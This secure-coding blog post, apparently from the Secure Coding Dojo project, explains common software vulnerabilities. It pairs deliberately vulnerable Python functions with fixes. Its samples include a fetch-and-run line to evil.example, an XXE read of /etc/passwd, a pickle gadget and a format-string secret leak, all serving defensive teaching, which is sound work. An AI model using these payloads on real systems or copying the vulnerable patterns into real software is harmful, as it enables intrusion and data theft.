Attack-Grams

Simple visualizations of software attacks

Paul Ionescu
5 min read, Jan 26, 2019

The Secure Coding Dojo is an open source project that aims to enable developers to learn about common software vulnerabilities in a fun way.

Since a picture is worth a thousand words, especially for those of us who do not have the patience to read long articles about vulnerabilities, I have created a set of simple diagrams which explain software attacks.

I have recently embedded these “Attack-Grams” in the Secure Coding Dojo training material along with the source presentation document. I also enclose them below. Pull requests as well as constructive feedback are greatly appreciated! Enjoy!

Authentication Bypass occurs when the application does not verify that a user has actually authenticated before granting access to restricted functionality, for example when only the login page checks for a session and the pages behind it do not.

Reliance on Untrusted Inputs occurs when the application relies on client-side validation alone, or stores a value used in a security decision (a role, a price, a user id) somewhere the attacker controls, such as a cookie, a hidden form field or a URL parameter.

Missing or Incorrect Authorization occurs when the application does not properly validate roles and permissions on every request, allowing elevation of privilege: vertical (an ordinary user reaches admin functions) or horizontal (one user reaches another user's records).
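The three weaknesses above tend to appear together, so here is one added example (my own illustration, not code from the Secure Coding Dojo) that shows them in a single request handler and then the corrected version. The user table, order table and session store are constructed in memory; the handler names are made up.

```python
import secrets
from dataclasses import dataclass, field

# Constructed server-side state: user records with roles, orders with owners,
# and a session table. Nothing security-relevant lives on the client.
USERS = {"alice": "user", "bob": "user", "root": "admin"}
ORDERS = {1001: "alice", 1002: "bob"}
SESSIONS = {}  # session id -> username


def login(username):
    """Issue an unguessable session id. The role is looked up server-side
    on every request and is never written into the cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


@dataclass
class Request:
    cookies: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)


def delete_user_vulnerable(req):
    """All three weaknesses at once: nobody checks that a user is logged in
    (authentication bypass), the role is read from a client-controlled cookie
    (reliance on untrusted input), so there is no real authorization."""
    if req.cookies.get("role") == "admin":
        return f"deleted {req.params.get('user')}"
    return "forbidden"


def current_user(req):
    """Authentication: map the session cookie to a user, or None."""
    return SESSIONS.get(req.cookies.get("sid", ""))


def delete_user_fixed(req):
    """Authenticate first, then authorize against the server-side role
    (vertical access control: only admins may delete accounts)."""
    user = current_user(req)
    if user is None:
        return "unauthenticated"
    if USERS.get(user) != "admin":
        return "forbidden"
    return f"deleted {req.params.get('user')}"


def view_order_fixed(req, order_id):
    """Horizontal access control: a user may only read their own orders,
    whatever order id they put in the URL."""
    user = current_user(req)
    if user is None:
        return "unauthenticated"
    if order_id not in ORDERS:
        return "not found"
    if ORDERS[order_id] != user and USERS.get(user) != "admin":
        return "forbidden"
    return f"order {order_id} belongs to {ORDERS[order_id]}"
```

The point of `current_user` is that every decision starts from the server's own session table; the only thing the client contributes is an opaque session id it cannot forge.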

If sensitive data is not protected, any security incident that exposes the storage or the network traffic becomes a full-scale data breach. Encrypt sensitive data in transit and at rest, and keep the keys separate from the data they protect.

Crypto algorithms are continuously put to the test, so we must keep them up to date. MD5 is the classic example: it is vulnerable to collision attacks, where an attacker crafts two different files that produce the same checksum, so an MD5 checksum no longer proves that a file is the one that was published or signed.

If password hashes are not salted, an attacker who steals them can still recover the passwords with precomputed (rainbow) tables, and every account that shares a password falls at once. Use a unique random salt per user together with a deliberately slow hash such as PBKDF2, bcrypt, scrypt or Argon2.

A password guessing attack is the simplest type of hack. Lack of account lockout or rate limiting, and lack of password strength requirements, let an attacker keep trying common passwords until one works.
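As an added example covering the two previous points (unsalted hashes and password guessing), here is a small credential store of my own, not code from the Dojo. It shows why an unsalted MD5 hash is reversible by lookup, then stores salted PBKDF2-HMAC-SHA256 hashes, enforces a minimum password strength and locks an account after repeated failures. The iteration count, lockout numbers and word list are constructed for the example; tune them for your own hardware and policy.

```python
import hashlib
import hmac
import os
import time

# Constructed tuning values. 600k PBKDF2-HMAC-SHA256 iterations is the OWASP
# figure at the time of writing (assumption); raise it as hardware improves.
PBKDF2_ITERATIONS = 600_000
MAX_FAILURES = 5              # consecutive failures before the account locks
LOCKOUT_SECONDS = 15 * 60
MIN_PASSWORD_LENGTH = 12
COMMON_PASSWORDS = ["123456", "password", "letmein123", "qwerty", "password1"]


def unsalted_md5(password):
    """What the vulnerable site stores: one fast, unsalted hash per password."""
    return hashlib.md5(password.encode()).hexdigest()


def rainbow_lookup(stolen_hash, wordlist=COMMON_PASSWORDS):
    """Offline attack: hash the word list once, then reverse any stolen unsalted
    hash by lookup. Users sharing a password share a hash, so one hit cracks all."""
    table = {unsalted_md5(p): p for p in wordlist}
    return table.get(stolen_hash)


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted, deliberately slow hash. A fresh random salt per user makes
    precomputed tables useless and hides which users share a password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def password_is_acceptable(password):
    return len(password) >= MIN_PASSWORD_LENGTH and password not in COMMON_PASSWORDS


class CredentialStore:
    def __init__(self, iterations=PBKDF2_ITERATIONS, now=time.monotonic):
        self.iterations = iterations
        self.now = now             # injectable clock so lockout can be tested
        self.users = {}            # username -> (salt, digest)
        self.failures = {}         # username -> (count, locked_until)

    def register(self, username, password):
        if not password_is_acceptable(password):
            raise ValueError("password too short or too common")
        self.users[username] = hash_password(password, iterations=self.iterations)

    def verify(self, username, password):
        """Returns 'ok', 'denied' or 'locked'. Unknown users go through the same
        slow hash so response time does not reveal whether an account exists."""
        count, locked_until = self.failures.get(username, (0, 0.0))
        if self.now() < locked_until:
            return "locked"
        record = self.users.get(username)
        salt, stored = record if record else (bytes(16), bytes(32))
        _, candidate = hash_password(password, salt, self.iterations)
        if record is not None and hmac.compare_digest(candidate, stored):
            self.failures.pop(username, None)
            return "ok"
        count += 1
        if count >= MAX_FAILURES:
            self.failures[username] = (0, self.now() + LOCKOUT_SECONDS)
            return "locked"
        self.failures[username] = (count, 0.0)
        return "denied"
```

A per-account lockout can itself be abused to lock legitimate users out, so in production pair it with per-IP rate limiting and consider a progressively growing delay instead of a hard lock.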

Integer Overflow: code that makes a security decision based on a comparison is bypassed when a counter or size value exceeds the maximum its integer type can hold and wraps around, to a negative value for signed types or to a small positive one for unsigned types.
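Python integers do not overflow, so this added example (mine, not the Dojo's) emulates 32-bit signed arithmetic with a small wrap helper in order to show the two cases the diagram describes: a size check that a wrapped product slips past, and a counter that flips negative. The buffer limit is a constructed value.

```python
MAX_BUFFER = 1 << 20            # 1 MiB: the limit the check must enforce (constructed)
INT32_MAX = (1 << 31) - 1


def to_int32(value):
    """Two's-complement wrap of a Python int to a signed 32-bit C int."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def check_allocation_vulnerable(count, item_size):
    """Mirrors C code doing `int total = count * item_size;` followed by
    `if (total > MAX_BUFFER) reject;`. The product wraps to a small or negative
    value that passes the comparison; the caller then allocates `total` bytes
    but copies `count` items into it."""
    total = to_int32(count * item_size)
    if total > MAX_BUFFER:
        return None
    return total


def check_allocation_fixed(count, item_size):
    """Validate the operands before multiplying so the product can never
    exceed the limit (in C, use checked arithmetic such as
    __builtin_mul_overflow or a division-based bound like this one)."""
    if count < 0 or item_size <= 0 or count > MAX_BUFFER // item_size:
        return None
    return count * item_size


def bump_counter_vulnerable(counter, limit=1000):
    """`if (counter + 1 > limit) reject; else counter++;` in 32-bit arithmetic.
    Once counter reaches INT32_MAX the sum wraps negative and the check passes."""
    nxt = to_int32(counter + 1)
    return None if nxt > limit else nxt


def bump_counter_fixed(counter, limit=1000):
    """Compare before adding, with the operands kept in range."""
    if counter < 0 or counter >= limit:
        return None
    return counter + 1
```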

When software is downloaded, especially over an insecure connection, it may be replaced with malware in transit. If the file's checksum or signature is not verified against a value obtained over a trusted channel, the user ends up executing the replacement. Note that a checksum published on the same insecure page offers no protection, since the attacker can replace both the file and the checksum.
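An added example of the integrity check (my code, not the page's): verify a downloaded artefact against a SHA-256 value that came over a trusted channel, refuse to run it otherwise, and show why a checksum fetched over the same untrusted channel proves nothing. The installer bytes and the evil.example URL are constructed.

```python
import hashlib
import hmac

# Constructed sample artefacts: the installer the vendor published and a copy a
# man-in-the-middle swapped in on the download path.
GENUINE = b"#!/bin/sh\necho installing the real tool\n"
TAMPERED = GENUINE + b"curl http://evil.example/stage2 | sh\n"


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# The value the vendor publishes over a trusted channel: an HTTPS page, signed
# release notes or package-manager metadata (here derived from GENUINE).
PUBLISHED_SHA256 = sha256_hex(GENUINE)


def verify_download(data, expected_sha256_hex):
    """True only if the downloaded bytes hash to the out-of-band value.
    compare_digest keeps the comparison time independent of where the
    strings first differ."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256_hex.strip().lower())


def install(data, expected_sha256_hex):
    """Never execute what failed verification; refuse loudly instead."""
    if not verify_download(data, expected_sha256_hex):
        raise RuntimeError("checksum mismatch: refusing to run the download")
    return "executed"


def insecure_mirror(attacker_in_control):
    """Simulates fetching both the file and its checksum from the same plain-HTTP
    page. Whoever can swap the file can swap the checksum beside it."""
    if attacker_in_control:
        return TAMPERED, sha256_hex(TAMPERED)
    return GENUINE, PUBLISHED_SHA256
```

The trap in `insecure_mirror` is the common mistake: the verification passes, but it only proves the file matches the attacker's checksum. The expected value must come from somewhere the attacker cannot touch, ideally a signature checked against a key you already hold.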

Open Redirect: sites that allow unrestricted redirects may be leveraged in phishing attacks. The user trusts the first part of the URL, which names the legitimate site, but the site betrays that trust by redirecting to the attacker's page. Redirect only to relative paths on your own site or to an allowlist of destinations.
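The validator below is an added example of my own (not from the Dojo) for a `?next=` parameter on a login page. It accepts only paths on the site's own origin and rejects the usual bypasses: absolute URLs, scheme-relative `//host`, `javascript:` and backslash variants that browsers normalise into a different host. The origin bank.example and the parameter name are assumptions.

```python
from urllib.parse import urljoin, urlsplit

SITE_ORIGIN = "https://bank.example"   # assumption: the only origin we send users to
DEFAULT_TARGET = "/account"


def safe_redirect_target(next_param):
    """Return a redirect target that stays on SITE_ORIGIN, or DEFAULT_TARGET.

    Rejected forms, each of which a browser would treat as leaving the site:
    absolute URLs (https://evil.example), scheme-relative //evil.example,
    non-http schemes (javascript:), backslash variants (/\\evil.example, which
    browsers normalise to //evil.example) and control characters."""
    if not next_param or any(c in next_param for c in "\\\r\n\t\x00"):
        return DEFAULT_TARGET
    parts = urlsplit(next_param)
    if parts.scheme or parts.netloc:
        return DEFAULT_TARGET
    if not next_param.startswith("/") or next_param.startswith("//"):
        return DEFAULT_TARGET
    # Resolve the way a browser would and confirm the origin is unchanged.
    resolved = urlsplit(urljoin(SITE_ORIGIN + "/", next_param))
    if f"{resolved.scheme}://{resolved.netloc}" != SITE_ORIGIN:
        return DEFAULT_TARGET
    return resolved.path + (f"?{resolved.query}" if resolved.query else "")


def login_redirect_vulnerable(next_param):
    """The classic bug: the Location header is whatever ?next= said."""
    return next_param or DEFAULT_TARGET


def login_redirect_fixed(next_param):
    return safe_redirect_target(next_param)
```

Where you genuinely need to send users off-site (an OAuth provider, a partner), keep a fixed allowlist of full URLs and redirect by index or name rather than by a URL the client supplies.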

Cross-Site Scripting: when sites reflect user input into a page without encoding it for the context it lands in (HTML body, attribute, URL, JavaScript), attackers can inject scripts that run in the victim's browser, steal sessions and alter the page.
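An added example (my own, not the Dojo's) of a reflected search page: the raw version hands the query to the browser as markup, the fixed version encodes for the HTML body, and a second helper shows that a value placed inside an `href` needs URL encoding and then attribute encoding, one layer per context. The page fragments are constructed.

```python
import html
from urllib.parse import quote


def results_page_vulnerable(query):
    """Reflects the search term verbatim into the HTML body."""
    return f"<p>Results for: {query}</p>"


def results_page_fixed(query):
    """HTML-body context: encode < > & and the quote characters."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def search_again_link_fixed(query):
    """Two contexts at once: URL-encode the value for the query string, then
    HTML-escape the whole attribute value inside double quotes."""
    href = "/search?q=" + quote(query, safe="")
    return f'<a href="{html.escape(href, quote=True)}">search again</a>'


def payload_survives(page, payload):
    """Crude check: if the raw payload appears unchanged, the browser will
    parse it as markup rather than display it as text."""
    return payload in page
```

A real application should let a templating engine with auto-escaping do this, and add a Content Security Policy as a second layer; the manual version above only makes the per-context rule visible.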

Cross-Site Request Forgery: sites with sensitive requests such as a bank money transfer must prevent such requests from being forged by other sites, where a hidden form would be submitted by the browser of an unsuspecting logged-in visitor, carrying the victim's session cookie. An unpredictable token tied to the session and checked on every state-changing request, together with the SameSite cookie attribute, is the standard defence.
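An added example (mine, not code from the page) of a transfer endpoint with and without a session-bound CSRF token. The token is an HMAC of the session id under a server secret, so a hostile page, which can neither read the victim's cookie nor know the secret, cannot produce it, and a token from the attacker's own session does not work either. Session ids and the form contents are constructed.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # assumption: one secret per deployment, server-side only


def csrf_token(session_id):
    """Token bound to the session: HMAC(secret, session id). A third-party page
    cannot read the victim's cookie or compute this, so it cannot supply it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id):
    """The legitimate page embeds the token as a hidden field."""
    return ('<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def transfer_vulnerable(session_id, form):
    """Relies on the session cookie alone, which the browser attaches to any
    request for this site, including one a hostile page auto-submits."""
    return f"moved {form['amount']} to {form['to']}"


def transfer_fixed(session_id, form):
    """Require the session-bound token in the request body (never only in a cookie)."""
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(session_id)):
        return "rejected: missing or invalid CSRF token"
    return f"moved {form['amount']} to {form['to']}"


# Constructed scenario: the victim is logged in; the attacker's page auto-submits
# this form to /transfer and the browser adds the victim's session cookie.
VICTIM_SESSION = "sess-victim"
ATTACKER_FORM = {"to": "attacker", "amount": "1000"}
```

Marking the session cookie `SameSite=Lax` (or `Strict`) stops the browser from attaching it to cross-site POSTs in the first place; the token remains the check you control.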

Servers that allow file uploads must prevent executables and scripts from being uploaded: accept only an allowlist of file types, check that the content matches the declared type, and store the file under a server-generated name and extension, outside the web root, so that even a file that slips through is never served as code.
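An added example of that upload policy, written by me rather than taken from the Dojo. It allows three types, requires the file's leading bytes to match the extension, ignores everything before the last dot (so `shell.php.png` is judged by its content, not its middle name), and returns the random server-chosen path where the bytes would be written. The upload directory and the type list are assumptions; the function does not touch the disk.

```python
import os
import secrets

# Allowed types with the magic bytes each must start with (constructed list).
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "pdf": b"%PDF-",
}
UPLOAD_DIR = "/var/app/uploads"   # assumption: outside the web root, mounted noexec


def detect_type(filename, data):
    """Return the allowed type the upload really is, or None. The extension is
    taken from the last dot only, compared case-insensitively, and must agree
    with the file's magic bytes; php, jsp, sh, exe and friends never match."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = {"jpeg": "jpg"}.get(ext, ext)
    magic = ALLOWED_TYPES.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    return ext


def storage_path_for(filename, data):
    """Where the server would write the file: a random name the client did not
    choose, with an extension the server decided, under UPLOAD_DIR.
    Returns None for rejected uploads."""
    kind = detect_type(filename, data)
    if kind is None:
        return None
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{kind}")
```

Magic bytes are easy to forge (a PNG header followed by PHP is still "a PNG" here), which is exactly why the rename and the storage location matter: the file is served back as an image by a handler that never executes anything, under a name the attacker cannot predict or request directly.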

Applications that process XML documents must disable processing of external entities, and ideally DTDs altogether. XML External Entities can be used to leak the content of files from the host server, and to make the server issue requests to internal systems on the attacker's behalf.
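An added example of my own (not the project's code) using Python's expat parser directly: every entity declaration is refused before anything is expanded, which blocks the `SYSTEM "file:///..."` case as well as internal entity bombs. The sample documents are constructed; the parser returns the document's character data so there is something to assert on.

```python
import xml.parsers.expat


class EntitiesForbidden(ValueError):
    """Raised when the document declares any entity, external or internal."""


def parse_text_safely(xml_bytes):
    """Parse XML with expat but refuse every entity declaration, which shuts
    out external entities (file disclosure, SSRF) and recursive expansion
    bombs. Returns the concatenated character data of the document."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []

    def forbid_entity(name, is_param, value, base, system_id, public_id, notation):
        raise EntitiesForbidden(f"entity {name!r} (SYSTEM={system_id!r}) is not allowed")

    def forbid_external_ref(context, base, system_id, public_id):
        raise EntitiesForbidden(f"external reference {system_id!r} is not allowed")

    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def is_safe_document(xml_bytes):
    """True if the document parses without tripping the entity guard."""
    try:
        parse_text_safely(xml_bytes)
        return True
    except EntitiesForbidden:
        return False


# Constructed samples: a harmless order, a classic XXE, and an expansion bomb.
BENIGN = b"<order><item>widget</item><qty>2</qty></order>"
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b"<order><item>&xxe;</item></order>")
BOMB = (b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;">]>'
        b"<lolz>&lol2;</lolz>")
```

In practice reach for the library's hardened mode (for Python, `defusedxml`; for Java, `XMLConstants.FEATURE_SECURE_PROCESSING` and disabling the `external-general-entities` and `load-external-dtd` features); the hand-rolled guard above shows what those switches do underneath.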

With Path Traversal, also known as a dot dot slash attack, attackers abuse a download link that takes a file name, passing sequences such as ../../../etc/passwd to read files outside the directory the link was meant to serve. Canonicalize the requested path and then verify that it still lies inside the allowed directory.
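An added example of that check, my code rather than the Dojo's. The naive version joins the user-supplied name onto the download directory; the fixed one canonicalizes the result with `os.path.realpath` (collapsing `..` and resolving symlinks) and accepts it only if `os.path.commonpath` says it is still under the root, which also defeats the `/downloads2` prefix trick that a plain `startswith` check misses. The download root is an assumed path that need not exist.

```python
import os

DOWNLOAD_ROOT = "/srv/app/downloads"   # assumption: the only directory that may be served


def resolve_download_vulnerable(name):
    """os.path.join does no checking: '..' walks out of the root, and an
    absolute name discards the root entirely."""
    return os.path.join(DOWNLOAD_ROOT, name)


def resolve_download_fixed(name):
    """Canonicalise, then confirm the result is still inside DOWNLOAD_ROOT.
    Returns the safe absolute path, or None when the request escapes."""
    root = os.path.realpath(DOWNLOAD_ROOT)
    candidate = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def startswith_check_is_not_enough(name):
    """The tempting shortcut: a string prefix test. '/srv/app/downloads2/x'
    starts with '/srv/app/downloads' yet is a different directory."""
    candidate = os.path.realpath(os.path.join(DOWNLOAD_ROOT, name))
    return candidate.startswith(DOWNLOAD_ROOT)
```

Two caveats: run the check on the decoded path (web frameworks decode `%2e%2e%2f` before your code sees it, but double-encoded input may not be), and if users can create symlinks inside the root, resolve and check at open time rather than earlier to avoid a race.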

OS Command Injection lets attackers append their own commands, using shell metacharacters such as ; | && and $( ), when a program builds a shell command line from user input. Pass the program and its arguments as a list without a shell, and validate the input against an allowlist as well.
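An added example (mine, not the page's) of the classic "ping a host" feature done both ways. `echo` stands in for the ping binary so the code runs offline and its output can be checked; everything else, including the injected `; echo INJECTED`, is exactly what would happen with `ping`. The hostname allowlist is a constructed defence-in-depth check.

```python
import re
import subprocess

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


def is_valid_hostname(value):
    """Allowlist validation: letters, digits, dots and hyphens only, and no
    leading hyphen so the value cannot be read as a command-line option."""
    return bool(HOSTNAME_RE.match(value))


def ping_vulnerable(host):
    """Builds one command line and hands it to /bin/sh. Shell metacharacters in
    `host` end the intended command and start the attacker's."""
    result = subprocess.run(f"echo Pinging {host}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def ping_fixed(host):
    """No shell: program and arguments are passed as a list, so the whole of
    `host` arrives as one argv entry, metacharacters and all."""
    result = subprocess.run(["echo", "Pinging", host],
                            capture_output=True, text=True)
    return result.stdout


def ping_hardened(host):
    """List form plus allowlist: rejects anything that is not a hostname
    before it reaches the program, including option-looking values like -h."""
    if not is_valid_hostname(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return ping_fixed(host)
```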

SQL Injection allows attackers to insert arbitrary database commands when user input is concatenated into a query string. Parameterized queries keep the data separate from the SQL, so input can only ever be compared, never executed.

Deserialization attacks target applications that accept serialized objects in binary or text format from untrusted sources. For the attack to be possible, the application must have on its class path classes that execute code when deserialized; chained together these are called gadgets. Unfortunately many commonly used third-party libraries include such classes.
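An added example (mine, not the page's) using Python's `pickle`, whose `__reduce__` protocol is the gadget mechanism in its purest form: the serialized bytes name a callable and its arguments, and `pickle.loads` calls it. The payload runs `echo` so it is harmless to execute; the fixes shown are a restricted unpickler that refuses every global it does not explicitly allow, and, preferably, a data-only format with explicit validation.

```python
import io
import json
import pickle
import subprocess


class Gadget:
    """What a malicious client sends. __reduce__ tells the unpickler which
    callable to run and with which arguments; any importable callable works.
    Here it runs `echo` so the demonstration is harmless."""
    def __reduce__(self):
        return (subprocess.check_output, (["echo", "attacker code ran"],))


MALICIOUS_PICKLE = pickle.dumps(Gadget())   # holds only a reference to subprocess.check_output
BENIGN_PICKLE = pickle.dumps({"user": "alice", "items": [1, 2]})


def load_vulnerable(data):
    """pickle.loads executes whatever callables the stream names."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global except an explicit allowlist (empty here, since
    plain dicts, lists, strings and numbers need no globals at all)."""
    ALLOWED = set()   # e.g. {("datetime", "datetime")} if you really need it

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_safely(data):
    """Convenience wrapper returning (ok, value_or_error_message)."""
    try:
        return True, load_restricted(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


def load_json_order(text):
    """Preferred design: a format that cannot express code, plus validation
    of the shape you expect."""
    obj = json.loads(text)
    if (not isinstance(obj, dict) or not isinstance(obj.get("user"), str)
            or not all(isinstance(i, int) for i in obj.get("items", []))):
        raise ValueError("unexpected shape")
    return obj
```

Java's `ObjectInputStream` filters (`ObjectInputFilter`) and .NET's type binders play the same role as `find_class` here: an allowlist of types, enforced before any constructor or callback runs.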

Buffer Overflow allows attackers to write past the bounds of a variable and alter adjacent program data, and even the program's control flow when a return address or function pointer is overwritten.

Format String Injection allows attackers to leak program memory by passing unexpected format specifiers (such as %x or %s for C's printf family) when user input is used as the format string itself; with %n it can also write to memory.
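The C case cannot be reproduced in Python, but the same bug class exists in `str.format`, so here is an added example of my own (not the Dojo's) showing it. When the template itself is attacker-controlled, a replacement field can walk from a harmless object through its class and `__init__` to the module globals and read a secret out of them. The secret and the `User` class are constructed; the fixes are a `Formatter` that forbids attribute and index traversal, and `string.Template`, which has no such syntax at all.

```python
import string

SECRET_KEY = "constructed-secret-do-not-ship"   # assumption: a secret living in module globals


class User:
    def __init__(self, name):
        self.name = name


def greet_vulnerable(template, user):
    """Attacker-controlled template passed to str.format. Replacement fields
    may traverse attributes and indexes, so
    {user.__class__.__init__.__globals__[SECRET_KEY]} walks from the object to
    its class, to __init__, to the module globals, to the secret."""
    return template.format(user=user)


class NoTraversalFormatter(string.Formatter):
    """str.format syntax, but a replacement field may only name a top-level
    argument: no attribute (.) or index ([) access."""
    def get_field(self, field_name, args, kwargs):
        if "." in field_name or "[" in field_name:
            raise ValueError(f"field {field_name!r} not allowed")
        return super().get_field(field_name, args, kwargs)


def greet_fixed(template, user):
    """Pass plain values rather than objects, and forbid traversal."""
    return NoTraversalFormatter().format(template, user=user.name)


def greet_with_template(template, user):
    """Alternative: string.Template substitutes $name placeholders only."""
    return string.Template(template).safe_substitute(user=user.name)


def is_rejected(template, user):
    """True if greet_fixed refuses the template."""
    try:
        greet_fixed(template, user)
        return False
    except ValueError:
        return True


ATTACKER_TEMPLATE = "Hi {user.__class__.__init__.__globals__[SECRET_KEY]}"
```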

Did you enjoy the Attack-Grams? Want to try the attacks yourself? Check out the Secure Coding Dojo Github repository here: https://github.com/trendmicro/SecureCodingDojo/wiki

If you’d like to learn more about Secure Coding check the Security Code Review 101 series here: https://medium.com/@paul_io/security-code-review-101-a3c593dc6854

Thanks for reading and safe coding!


Paul Ionescu

Cyber-security professional and OWASP contributor from Ottawa, Canada. Creator and maintainer of the Secure Coding Dojo open source project.